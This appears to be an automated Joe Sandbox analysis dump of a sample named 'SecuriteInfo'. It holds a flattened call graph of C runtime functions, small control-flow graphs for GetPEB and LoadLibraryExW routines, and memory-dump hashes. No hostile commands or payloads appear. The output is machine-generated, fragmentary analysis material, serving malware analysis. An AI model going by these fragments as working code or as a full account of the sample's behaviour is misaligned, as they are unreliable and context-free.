19488->19479 19489 fe6398 19488->19489 19490 fd5d1d __freea 12 API calls 19489->19490 19490->19483 19492 fe51b7 std::_Lockit::_Lockit 5 API calls 19491->19492 19493 fe5690 19492->19493 19494 fe5696 19493->19494 19495 fe56e2 std::_Locinfo::_Locinfo_dtor 5 API calls 19493->19495 19494->19477 19494->19478 19494->19483 19496 fe56d6 LCMapStringW 19495->19496 19496->19494 19499 fe885e WideCharToMultiByte 19497->19499 19499->19488 19500->19370 19511 fdf368 19501->19511 19503 fe93e3 19504 fdf368 _swprintf 39 API calls 19503->19504 19505 fe9402 19504->19505 19506 fe9397 19505->19506 19507 fe3cf6 ___free_lconv_mon 12 API calls 19505->19507 19508 fe93b5 19506->19508 19507->19506 19525 fdcd4c LeaveCriticalSection 19508->19525 19510 fe93a3 19510->19068 19512 fdf379 19511->19512 19521 fdf375 _Yarn 19511->19521 19513 fdf380 19512->19513 19514 fdf393 codecvt 19512->19514 19515 fdd600 __Wcrtomb 12 API calls 19513->19515 19518 fdf3ca 19514->19518 19519 fdf3c1 19514->19519 19514->19521 19516 fdf385 19515->19516 19517 fda90f __strnicoll 39 API calls 19516->19517 19517->19521 19518->19521 19523 fdd600 __Wcrtomb 12 API calls 19518->19523 19520 fdd600 __Wcrtomb 12 API calls 19519->19520 19522 fdf3c6 19520->19522 19521->19503 19524 fda90f __strnicoll 39 API calls 19522->19524 19523->19522 19524->19521 19525->19510 19527 fe1fb6 19526->19527 19528 fe1fc4 19526->19528 19527->19528 19530 fe1fdc 19527->19530 19529 fdd600 __Wcrtomb 12 API calls 19528->19529 19534 fe1fcc 19529->19534 19532 fe1fd6 19530->19532 19533 fdd600 __Wcrtomb 12 API calls 19530->19533 19531 fda90f __strnicoll 39 API calls 19531->19532 19532->19016 19533->19534 19534->19531 19536 fdfd29 19535->19536 19537 fdfcfa 19535->19537 19538 fdfd40 19536->19538 19539 fe3cf6 ___free_lconv_mon 12 API calls 19536->19539 19537->19017 19540 fe3cf6 ___free_lconv_mon 12 API calls 19538->19540 19539->19536 19540->19537 19542 fda948 19541->19542 19543 fda713 CallUnexpected 8 API calls 19542->19543 19544 fda95d GetCurrentProcess TerminateProcess 19543->19544 19544->19023 19546 fd309f 19545->19546 19547 fd3070 OpenIcon 19545->19547 19548 fd3048 19546->19548 19547->19546 19547->19547 19551 fd238f 19548->19551 19552 fd23c2 19551->19552 19553 fd2494 19552->19553 19558 fd2081 19552->19558 19568 fd19ae 19552->19568 19554 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19553->19554 19555 fd24a6 19554->19555 19555->18830 19559 fd208d __EH_prolog3_catch 19558->19559 19575 fd1e9a 19559->19575 19566 fd217e codecvt 19566->19552 19567 fd20c6 std::ios_base::_Ios_base_dtor 19594 fd2fa9 19567->19594 19906 fd3c9b 19568->19906 19570 fd19c1 19910 fd3b67 19570->19910 19572 fd19cc 19573 fd39ed 49 API calls 19572->19573 19574 fd19d3 19573->19574 19574->19552 19577 fd1ea9 19575->19577 19576 fd1ec7 19576->19567 19579 fd1a50 19576->19579 19577->19576 19606 fd39ed 19577->19606 19614 fd3dc6 19579->19614 19583 fd1a87 19637 fd3e1e 19583->19637 19584 fd1a74 19584->19583 19626 fd26f3 19584->19626 19587 fd1abd 19587->19567 19589 fd1a9e 19634 fd4111 19589->19634 19590 fd1ac3 19644 fd2e36 19590->19644 19595 fd2176 19594->19595 19596 fd2fc0 std::ios_base::_Init 19594->19596 19601 fd2040 19595->19601 19600 fd2ff9 19596->19600 19797 fd1e40 19596->19797 19597 fd740c Concurrency::cancel_current_task RaiseException 19598 fd3012 19597->19598 19600->19597 19888 fd3fad 19601->19888 19603 fd2048 19604 fd2001 19603->19604 19892 fd2d13 19603->19892 19604->19566 19607 fd39f9 __EH_prolog3_catch 19606->19607 19608 fd3a9e codecvt 19607->19608 19609 fd1e9a 49 API calls 19607->19609 19608->19576 19612 fd3a18 19609->19612 19610 fd3a96 19611 fd2040 49 API calls 19610->19611 19611->19608 19612->19610 19613 fd2fa9 std::ios_base::_Init 41 API calls 19612->19613 19613->19610 19615 fd3ddc 19614->19615 19616 fd3dd5 19614->19616 19618 fd1a61 19615->19618 19653 fd5c6a EnterCriticalSection 19615->19653 19648 fdcd63 19616->19648 19620 fd21b2 19618->19620 19621 fd21be 19620->19621 19622 fd21e2 19620->19622 19623 fd3dc6 std::_Lockit::_Lockit 7 API calls 19621->19623 19622->19584 19624 fd21c8 19623->19624 19625 fd3e1e std::_Lockit::~_Lockit 2 API calls 19624->19625 19625->19622 19627 fd1a97 19626->19627 19628 fd2707 19626->19628 19627->19589 19627->19590 19628->19627 19705 fd610c 19628->19705 19630 fd2713 codecvt 19631 fd272b 19630->19631 19718 fd1c4c 19630->19718 19631->19627 19727 fd1f84 19631->19727 19635 fd610c codecvt 41 API calls 19634->19635 19636 fd411c 19635->19636 19636->19583 19638 fd3e28 19637->19638 19639 fdcd71 19637->19639 19641 fd3e3b 19638->19641 19795 fd5c78 LeaveCriticalSection 19638->19795 19796 fdcd4c LeaveCriticalSection 19639->19796 19641->19587 19642 fdcd78 19642->19587 19645 fd2e44 19644->19645 19646 fd740c Concurrency::cancel_current_task RaiseException 19645->19646 19647 fd2e52 19646->19647 19654 fe571e 19648->19654 19653->19618 19675 fe50cd 19654->19675 19674 fe5750 19674->19674 19676 fe52b6 std::_Lockit::_Lockit 5 API calls 19675->19676 19677 fe50e3 19676->19677 19678 fe50e7 19677->19678 19679 fe52b6 std::_Lockit::_Lockit 5 API calls 19678->19679 19680 fe50fd 19679->19680 19681 fe5101 19680->19681 19682 fe52b6 std::_Lockit::_Lockit 5 API calls 19681->19682 19683 fe5117 19682->19683 19684 fe511b 19683->19684 19685 fe52b6 std::_Lockit::_Lockit 5 API calls 19684->19685 19686 fe5131 19685->19686 19687 fe5135 19686->19687 19688 fe52b6 std::_Lockit::_Lockit 5 API calls 19687->19688 19689 fe514b 19688->19689 19690 fe514f 19689->19690 19691 fe52b6 std::_Lockit::_Lockit 5 API calls 19690->19691 19692 fe5165 19691->19692 19693 fe5169 19692->19693 19694 fe52b6 std::_Lockit::_Lockit 5 API calls 19693->19694 19695 fe517f 19694->19695 19696 fe5183 19695->19696 19697 fe52b6 std::_Lockit::_Lockit 5 API calls 19696->19697 19698 fe5199 19697->19698 19699 fe51b7 19698->19699 19700 fe52b6 std::_Lockit::_Lockit 5 API calls 19699->19700 19701 fe51cd 19700->19701 19702 fe519d 19701->19702 19703 fe52b6 std::_Lockit::_Lockit 5 API calls 19702->19703 19704 fe51b3 19703->19704 19704->19674 19708 fd6111 19705->19708 19707 fd612b 19707->19630 19708->19707 19709 fe1a05 codecvt 2 API calls 19708->19709 19710 fd2e19 Concurrency::cancel_current_task 19708->19710 19745 fdcd7a 19708->19745 19709->19708 19711 fd6137 19710->19711 19742 fd740c 19710->19742 19711->19711 19713 fd2e35 19714 fda85b _Deallocate 39 API calls 19713->19714 19715 fda92e 19714->19715 19716 fda93c _Deallocate 11 API calls 19715->19716 19717 fda93b 19716->19717 19719 fd3dc6 std::_Lockit::_Lockit 7 API calls 19718->19719 19720 fd1c58 19719->19720 19721 fd1c99 19720->19721 19722 fd1c86 19720->19722 19761 fd3f8d 19721->19761 19752 fd4241 19722->19752 19791 fd428c 19727->19791 19730 fd1f9d 19732 fd1fb0 19730->19732 19734 fdab3a _Yarn 12 API calls 19730->19734 19731 fdab3a _Yarn 12 API calls 19731->19730 19733 fd1fc1 19732->19733 19735 fdab3a _Yarn 12 API calls 19732->19735 19736 fd1fd2 19733->19736 19737 fdab3a _Yarn 12 API calls 19733->19737 19734->19732 19735->19733 19738 fd1fe3 19736->19738 19739 fdab3a _Yarn 12 API calls 19736->19739 19737->19736 19740 fd1ff4 19738->19740 19741 fdab3a _Yarn 12 API calls 19738->19741 19739->19738 19741->19740 19743 fd7426 19742->19743 19744 fd7453 RaiseException 19742->19744 19743->19744 19744->19713 19751 fe3d30 __Getctype 19745->19751 19746 fe3d6e 19747 fdd600 __Wcrtomb 12 API calls 19746->19747 19749 fe3d6c 19747->19749 19748 fe3d59 HeapAlloc 19748->19749 19748->19751 19749->19708 19750 fe1a05 codecvt 2 API calls 19750->19751 19751->19746 19751->19748 19751->19750 19766 fdcfda 19752->19766 19756 fd4265 19757 fd4275 19756->19757 19758 fdcfda std::_Locinfo::_Locinfo_dtor 61 API calls 19756->19758 19759 fd409b _Yarn 13 API calls 19757->19759 19758->19757 19760 fd1c90 19759->19760 19760->19631 19785 fd3ee4 19761->19785 19764 fd740c Concurrency::cancel_current_task RaiseException 19765 fd3fac 19764->19765 19767 fe571e std::_Lockit::_Lockit 5 API calls 19766->19767 19768 fdcfe7 19767->19768 19777 fdcd85 19768->19777 19771 fd409b 19772 fd40a9 19771->19772 19776 fd40d4 _Yarn 19771->19776 19773 fdab3a _Yarn 12 API calls 19772->19773 19774 fd40b5 19772->19774 19773->19774 19775 fdcd7a _Yarn 13 API calls 19774->19775 19774->19776 19775->19776 19776->19756 19778 fdcd91 ___scrt_is_nonwritable_in_current_image 19777->19778 19779 fdcd04 std::_Lockit::_Lockit EnterCriticalSection 19778->19779 19780 fdcd9f 19779->19780 19781 fdcde0 std::_Locinfo::_Locinfo_dtor 61 API calls 19780->19781 19782 fdcdac 19781->19782 19783 fdcdd4 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 19782->19783 19784 fd424d 19783->19784 19784->19771 19788 fd1df3 19785->19788 19789 fd738a ___std_exception_copy 40 API calls 19788->19789 19790 fd1e1f 19789->19790 19790->19764 19792 fd4298 19791->19792 19793 fd1f8e 19791->19793 19794 fdcfda std::_Locinfo::_Locinfo_dtor 61 API calls 19792->19794 19793->19730 19793->19731 19794->19793 19795->19641 19796->19642 19800 fd1efa 19797->19800 19809 fd1b9a 19800->19809 19807 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19808 fd1e55 19807->19808 19808->19600 19810 fd1bb7 _strlen 19809->19810 19828 fd114d 19810->19828 19812 fd1bc4 19813 fd1cc5 19812->19813 19846 fd1b66 19813->19846 19820 fd2e73 std::ios_base::_Init 39 API calls 19821 fd1d08 19820->19821 19822 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19821->19822 19823 fd1d27 19822->19823 19824 fd2e73 19823->19824 19825 fd2e7e 19824->19825 19826 fd1f32 19824->19826 19877 fd131c 19825->19877 19826->19807 19829 fd11b8 19828->19829 19832 fd115e std::ios_base::_Init 19828->19832 19843 fd2ec2 19829->19843 19834 fd1165 std::ios_base::_Init 19832->19834 19835 fd1100 19832->19835 19834->19812 19836 fd110b 19835->19836 19837 fd1113 19835->19837 19838 fd1122 std::ios_base::_Init 41 API calls 19836->19838 19839 fd111f 19837->19839 19841 fd610c codecvt 41 API calls 19837->19841 19840 fd1111 19838->19840 19839->19834 19840->19834 19842 fd111d 19841->19842 19842->19834 19844 fd3f4d std::ios_base::_Init 41 API calls 19843->19844 19845 fd2ecc 19844->19845 19847 fd1b86 19846->19847 19866 fd1239 19847->19866 19849 fd1b93 19850 fd2c91 19849->19850 19851 fd2cab _strlen 19850->19851 19852 fd2cc2 19850->19852 19873 fd2f50 19851->19873 19854 fd2f50 std::ios_base::_Init 41 API calls 19852->19854 19855 fd2ce9 19854->19855 19856 fd2e73 std::ios_base::_Init 39 API calls 19855->19856 19857 fd2cf1 std::ios_base::_Init 19856->19857 19858 fd2e73 std::ios_base::_Init 39 API calls 19857->19858 19859 fd2d04 19858->19859 19860 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19859->19860 19861 fd1cf5 19860->19861 19862 fd1e79 19861->19862 19863 fd1e86 19862->19863 19864 fd1df3 std::exception::exception 40 API calls 19863->19864 19865 fd1d00 19864->19865 19865->19820 19867 fd129b 19866->19867 19870 fd124a std::ios_base::_Init 19866->19870 19868 fd2ec2 std::ios_base::_Init 41 API calls 19867->19868 19869 fd12a0 19868->19869 19871 fd1100 std::ios_base::_Init 41 API calls 19870->19871 19872 fd1251 _Yarn std::ios_base::_Init 19870->19872 19871->19872 19872->19849 19874 fd2f90 19873->19874 19876 fd2f66 std::ios_base::_Init 19873->19876 19875 fd1890 std::ios_base::_Init 41 API calls 19874->19875 19875->19876 19876->19852 19878 fd1329 19877->19878 19879 fd1336 std::ios_base::_Ios_base_dtor 19877->19879 19881 fd24ad 19878->19881 19879->19826 19882 fd24ca 19881->19882 19883 fd24c7 19881->19883 19884 fda85b _Deallocate 39 API calls 19882->19884 19883->19879 19885 fda92e 19884->19885 19886 fda93c _Deallocate 11 API calls 19885->19886 19887 fda93b 19886->19887 19888->19603 19889 fd7827 19888->19889 19896 fd934c 19889->19896 19891 fd782c 19891->19603 19894 fd2d1f __EH_prolog3_catch 19892->19894 19893 fd2d5b codecvt 19893->19604 19894->19893 19895 fd2fa9 std::ios_base::_Init 41 API calls 19894->19895 19895->19893 19897 fd9358 GetLastError 19896->19897 19898 fd9355 19896->19898 19901 fda4c3 19897->19901 19898->19891 19902 fda362 ___vcrt_InitializeCriticalSectionEx 5 API calls 19901->19902 19903 fda4dd 19902->19903 19904 fda4f5 TlsGetValue 19903->19904 19905 fd936d SetLastError 19903->19905 19904->19905 19905->19891 19907 fd3caf 19906->19907 19918 fd19d7 19907->19918 19909 fd3cb8 std::ios_base::_Ios_base_dtor 19909->19570 19911 fd3b73 __EH_prolog3_catch 19910->19911 19912 fd1e9a 49 API calls 19911->19912 19913 fd3b85 19912->19913 19914 fd2fa9 std::ios_base::_Init 41 API calls 19913->19914 19915 fd3c18 19914->19915 19916 fd2040 49 API calls 19915->19916 19917 fd3c20 codecvt 19916->19917 19917->19572 19919 fd3dc6 std::_Lockit::_Lockit 7 API calls 19918->19919 19920 fd19e8 19919->19920 19921 fd21b2 int 9 API calls 19920->19921 19922 fd19fb 19921->19922 19932 fd1a0e 19922->19932 19933 fd268e 19922->19933 19923 fd3e1e std::_Lockit::~_Lockit 2 API calls 19924 fd1a44 19923->19924 19924->19909 19927 fd1a4a 19929 fd2e36 RaiseException 19927->19929 19928 fd1a25 19930 fd4111 std::_Facet_Register 41 API calls 19928->19930 19931 fd1a4f 19929->19931 19930->19932 19932->19923 19934 fd1a1e 19933->19934 19935 fd26a2 19933->19935 19934->19927 19934->19928 19935->19934 19936 fd610c codecvt 41 API calls 19935->19936 19938 fd26ae codecvt 19936->19938 19937 fd26d7 19937->19934 19939 fd1f84 std::_Locinfo::~_Locinfo 61 API calls 19937->19939 19938->19937 19940 fd1c4c codecvt 64 API calls 19938->19940 19939->19934 19941 fd26c6 19940->19941 19943 fd286f 19941->19943 19948 fd4356 19943->19948 19970 fdd036 19948->19970 19950 fd435f __Getctype 19951 fd4379 19950->19951 19952 fd4397 19950->19952 19975 fdd012 19951->19975 19954 fdd012 __Getctype 39 API calls 19952->19954 19955 fd4380 19954->19955 19980 fdd05b 19955->19980 19957 fd2883 19960 fd43c1 19957->19960 19961 fd43d4 codecvt 19960->19961 19962 fdd036 __Getctype 39 API calls 19961->19962 19963 fd43dc 19962->19963 19994 fdd082 19963->19994 19966 fdd05b __Getctype 39 API calls 19967 fd43eb 19966->19967 19968 fd2895 19967->19968 19969 fdd012 __Getctype 39 API calls 19967->19969 19968->19937 19969->19968 19971 fe2a40 __Getctype 39 API calls 19970->19971 19972 fdd041 19971->19972 19973 fe3d7e __Getctype 39 API calls 19972->19973 19974 fdd051 19973->19974 19974->19950 19976 fe2a40 __Getctype 39 API calls 19975->19976 19977 fdd01d 19976->19977 19978 fe3d7e __Getctype 39 API calls 19977->19978 19979 fdd02d 19978->19979 19979->19955 19981 fe2a40 __Getctype 39 API calls 19980->19981 19982 fdd066 19981->19982 19983 fe3d7e __Getctype 39 API calls 19982->19983 19984 fd43a8 19983->19984 19984->19957 19985 fdd504 19984->19985 19986 fdd54c 19985->19986 19987 fdd511 19985->19987 19986->19957 19987->19987 19988 fdcd7a _Yarn 13 API calls 19987->19988 19989 fdd534 19988->19989 19989->19986 19990 fe6421 __Getctype 39 API calls 19989->19990 19991 fdd545 19990->19991 19991->19986 19992 fda93c _Deallocate 11 API calls 19991->19992 19993 fdd562 19992->19993 19995 fe2a40 __Getctype 39 API calls 19994->19995 19996 fdd08d 19995->19996 19997 fe3d7e __Getctype 39 API calls 19996->19997 19998 fd43e3 19997->19998 19998->19966 20000 fe1efa ___scrt_uninitialize_crt 19999->20000 20001 fe1ee8 19999->20001 20000->18871 20002 fe1ef6 20001->20002 20004 fde292 20001->20004 20002->18871 20007 fde11f 20004->20007 20010 fde013 20007->20010 20011 fde01f ___scrt_is_nonwritable_in_current_image 20010->20011 20018 fdcd04 EnterCriticalSection 20011->20018 20013 fde095 20027 fde0b3 20013->20027 20014 fde029 ___scrt_uninitialize_crt 20014->20013 20019 fddf87 20014->20019 20018->20014 20020 fddf93 ___scrt_is_nonwritable_in_current_image 20019->20020 20030 fdd737 EnterCriticalSection 20020->20030 20022 fddfd6 20044 fde007 20022->20044 20023 fddf9d ___scrt_uninitialize_crt 20023->20022 20031 fde22d 20023->20031 20146 fdcd4c LeaveCriticalSection 20027->20146 20029 fde0a1 20029->20002 20030->20023 20032 fde242 _Fputc 20031->20032 20033 fde249 20032->20033 20034 fde254 20032->20034 20035 fde11f ___scrt_uninitialize_crt 68 API calls 20033->20035 20047 fde1c4 20034->20047 20037 fde24f 20035->20037 20039 fda64b _Fputc 39 API calls 20037->20039 20040 fde28c 20039->20040 20040->20022 20042 fde275 20060 fe7022 20042->20060 20145 fdd74b LeaveCriticalSection 20044->20145 20046 fddff5 20046->20014 20048 fde1dd 20047->20048 20052 fde204 20047->20052 20049 fe4c92 _Ungetc 39 API calls 20048->20049 20048->20052 20050 fde1f9 20049->20050 20071 fe784d 20050->20071 20052->20037 20053 fe4c92 20052->20053 20054 fe4c9e 20053->20054 20055 fe4cb3 20053->20055 20056 fdd600 __Wcrtomb 12 API calls 20054->20056 20055->20042 20057 fe4ca3 20056->20057 20058 fda90f __strnicoll 39 API calls 20057->20058 20059 fe4cae 20058->20059 20059->20042 20061 fe7033 20060->20061 20062 fe7040 20060->20062 20063 fdd600 __Wcrtomb 12 API calls 20061->20063 20064 fe7089 20062->20064 20066 fe7067 20062->20066 20070 fe7038 20063->20070 20065 fdd600 __Wcrtomb 12 API calls 20064->20065 20067 fe708e 20065->20067 20112 fe6f80 20066->20112 20068 fda90f __strnicoll 39 API calls 20067->20068 20068->20070 20070->20037 20074 fe7859 ___scrt_is_nonwritable_in_current_image 20071->20074 20072 fe7861 20072->20052 20073 fe791d 20075 fda892 _Fputc 27 API calls 20073->20075 20074->20072 20074->20073 20076 fe78ae 20074->20076 20075->20072 20082 fea1a0 EnterCriticalSection 20076->20082 20078 fe78b4 20079 fe78d1 20078->20079 20083 fe7955 20078->20083 20109 fe7915 20079->20109 20082->20078 20085 fe797a 20083->20085 20106 fe799d ___scrt_uninitialize_crt 20083->20106 20084 fe797e 20086 fda892 _Fputc 27 API calls 20084->20086 20085->20084 20087 fe79dc 20085->20087 20086->20106 20088 fe79f3 20087->20088 20089 fe83c8 ___scrt_uninitialize_crt 41 API calls 20087->20089 20090 fe74d9 ___scrt_uninitialize_crt 40 API calls 20088->20090 20089->20088 20091 fe79fd 20090->20091 20092 fe7a43 20091->20092 20093 fe7a03 20091->20093 20094 fe7aa6 WriteFile 20092->20094 20095 fe7a57 20092->20095 20096 fe7a2d 20093->20096 20097 fe7a0a 20093->20097 20098 fe7ac8 GetLastError 20094->20098 20094->20106 20100 fe7a5f 20095->20100 20101 fe7a94 20095->20101 20099 fe709f ___scrt_uninitialize_crt 45 API calls 20096->20099 20102 fe7471 ___scrt_uninitialize_crt 6 API calls 20097->20102 20097->20106 20098->20106 20099->20106 20104 fe7a64 20100->20104 20105 fe7a82 20100->20105 20103 fe7557 ___scrt_uninitialize_crt 7 API calls 20101->20103 20102->20106 20103->20106 20104->20106 20108 fe7632 ___scrt_uninitialize_crt 7 API calls 20104->20108 20107 fe771b ___scrt_uninitialize_crt 8 API calls 20105->20107 20106->20079 20107->20106 20108->20106 20110 fea1c3 ___scrt_uninitialize_crt LeaveCriticalSection 20109->20110 20111 fe791b 20110->20111 20111->20072 20113 fe6f8c ___scrt_is_nonwritable_in_current_image 20112->20113 20125 fea1a0 EnterCriticalSection 20113->20125 20115 fe6f9b 20123 fe6fe0 20115->20123 20126 fea277 20115->20126 20117 fdd600 __Wcrtomb 12 API calls 20119 fe6fe7 20117->20119 20118 fe6fc7 FlushFileBuffers 20118->20119 20120 fe6fd3 GetLastError 20118->20120 20142 fe7016 20119->20142 20139 fdd5ed 20120->20139 20123->20117 20125->20115 20127 fea299 20126->20127 20128 fea284 20126->20128 20130 fdd5ed __dosmaperr 12 API calls 20127->20130 20132 fea2be 20127->20132 20129 fdd5ed __dosmaperr 12 API calls 20128->20129 20131 fea289 20129->20131 20133 fea2c9 20130->20133 20134 fdd600 __Wcrtomb 12 API calls 20131->20134 20132->20118 20136 fdd600 __Wcrtomb 12 API calls 20133->20136 20135 fea291 20134->20135 20135->20118 20137 fea2d1 20136->20137 20138 fda90f __strnicoll 39 API calls 20137->20138 20138->20135 20140 fe2b91 __Wcrtomb 12 API calls 20139->20140 20141 fdd5f2 20140->20141 20141->20123 20143 fea1c3 ___scrt_uninitialize_crt LeaveCriticalSection 20142->20143 20144 fe6fff 20143->20144 20144->20070 20145->20046 20146->20029 21215 feb47e 21217 feb493 21215->21217 21219 fe53f5 21217->21219 21220 fe5101 std::_Lockit::_Lockit 5 API calls 21219->21220 21221 fe5403 21220->21221 21223 fe5409 21221->21223 21224 fe5022 21221->21224 21225 fe502e ___scrt_is_nonwritable_in_current_image 21224->21225 21231 fdcd04 EnterCriticalSection 21225->21231 21227 fe503c std::_Lockit::_Lockit 21228 fe504d EnumSystemLocalesW 21227->21228 21232 fe5092 21228->21232 21231->21227 21235 fdcd4c LeaveCriticalSection 21232->21235 21234 fe507b 21234->21223 21235->21234 23231 fe065a 23234 fe0326 23231->23234 23235 fe0332 ___scrt_is_nonwritable_in_current_image 23234->23235 23242 fdcd04 EnterCriticalSection 23235->23242 23237 fe036a 23243 fe0388 23237->23243 23239 fe033c 23239->23237 23241 feb30e __Getctype 12 API calls 23239->23241 23241->23239 23242->23239 23246 fdcd4c LeaveCriticalSection 23243->23246 23245 fe0376 23246->23245 22279 fe2907 22280 fe2922 22279->22280 22281 fe2912 22279->22281 22285 fe2928 22281->22285 22284 fe3cf6 ___free_lconv_mon 12 API calls 22284->22280 22286 fe293d 22285->22286 22287 fe2943 22285->22287 22288 fe3cf6 ___free_lconv_mon 12 API calls 22286->22288 22289 fe3cf6 ___free_lconv_mon 12 API calls 22287->22289 22288->22287 22290 fe294f 22289->22290 22291 fe3cf6 ___free_lconv_mon 12 API calls 22290->22291 22292 fe295a 22291->22292 22293 fe3cf6 ___free_lconv_mon 12 API calls 22292->22293 22294 fe2965 22293->22294 22295 fe3cf6 ___free_lconv_mon 12 API calls 22294->22295 22296 fe2970 22295->22296 22297 fe3cf6 ___free_lconv_mon 12 API calls 22296->22297 22298 fe297b 22297->22298 22299 fe3cf6 ___free_lconv_mon 12 API calls 22298->22299 22300 fe2986 22299->22300 22301 fe3cf6 ___free_lconv_mon 12 API calls 22300->22301 22302 fe2991 22301->22302 22303 fe3cf6 ___free_lconv_mon 12 API calls 22302->22303 22304 fe299c 22303->22304 22305 fe3cf6 ___free_lconv_mon 12 API calls 22304->22305 22306 fe29aa 22305->22306 22311 fe2754 22306->22311 22312 fe2760 ___scrt_is_nonwritable_in_current_image 22311->22312 22327 fdcd04 EnterCriticalSection 22312->22327 22314 fe2794 22328 fe27b3 22314->22328 22316 fe276a 22316->22314 22318 fe3cf6 ___free_lconv_mon 12 API calls 22316->22318 22318->22314 22319 fe27bf 22320 fe27cb ___scrt_is_nonwritable_in_current_image 22319->22320 22332 fdcd04 EnterCriticalSection 22320->22332 22322 fe27d5 22323 fe29f5 __Getctype 12 API calls 22322->22323 22324 fe27e8 22323->22324 22333 fe2808 22324->22333 22327->22316 22331 fdcd4c LeaveCriticalSection 22328->22331 22330 fe27a1 22330->22319 22331->22330 22332->22322 22336 fdcd4c LeaveCriticalSection 22333->22336 22335 fe27f6 22335->22284 22336->22335

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 131 fea021-fea039 GetPEB 132 fea04a-fea04c 131->132 133 fea03b-fea03f call fe5339 131->133 134 fea04d-fea051 132->134 136 fea044-fea048 133->136 136->132 136->134
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9395896353acccf952a291b6f0163853f95de6a84289665eef3950dd9f5b70ca
            • Instruction ID: 3165abae976a1a503af0a042ae64050d25d6bdce231aed9858111864727df6eb
            • Opcode Fuzzy Hash: 9395896353acccf952a291b6f0163853f95de6a84289665eef3950dd9f5b70ca
            • Instruction Fuzzy Hash: DEE08C329112B8EBCB14DF8DC94498AF3ECFB44B50B11449AB611D3100C278EE00D7D1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 148 fe010f call fea021 150 fe0114-fe0117 148->150 151 fe012e-fe0130 150->151 152 fe0119-fe0129 GetPEB 150->152 152->151 153 fe012b-fe012d 152->153
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 60db8ef128b66eb642bb16a09a4d214568f9693845bcad6d0eb7c0ed8f4044be
            • Instruction ID: 79b0a121dc3b0b4f6cc34e1f8544064fed43851f6d00944e817edb6ab81195df
            • Opcode Fuzzy Hash: 60db8ef128b66eb642bb16a09a4d214568f9693845bcad6d0eb7c0ed8f4044be
            • Instruction Fuzzy Hash: B6C08C38800A804ACE3989119A713A433D6A3D1792F80248CC5020F64AC95EACC2F611
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 fe51eb-fe51f7 1 fe5289-fe528c 0->1 2 fe51fc-fe520d 1->2 3 fe5292 1->3 5 fe520f-fe5212 2->5 6 fe521a-fe5233 LoadLibraryExW 2->6 4 fe5294-fe5298 3->4 9 fe5218 5->9 10 fe52b2-fe52b4 5->10 7 fe5299-fe52a9 6->7 8 fe5235-fe523e GetLastError 6->8 7->10 14 fe52ab-fe52ac FreeLibrary 7->14 12 fe5277-fe5284 8->12 13 fe5240-fe5252 call fe26c8 8->13 11 fe5286 9->11 10->4 11->1 12->11 13->12 17 fe5254-fe5266 call fe26c8 13->17 14->10 17->12 20 fe5268-fe5275 LoadLibraryExW 17->20 20->7 20->12
            APIs
            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,6FA3B488,?,00FE52F8,?,?,00000000,00000000), ref: 00FE52AC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID: api-ms-$ext-ms-
            • API String ID: 3664257935-537541572
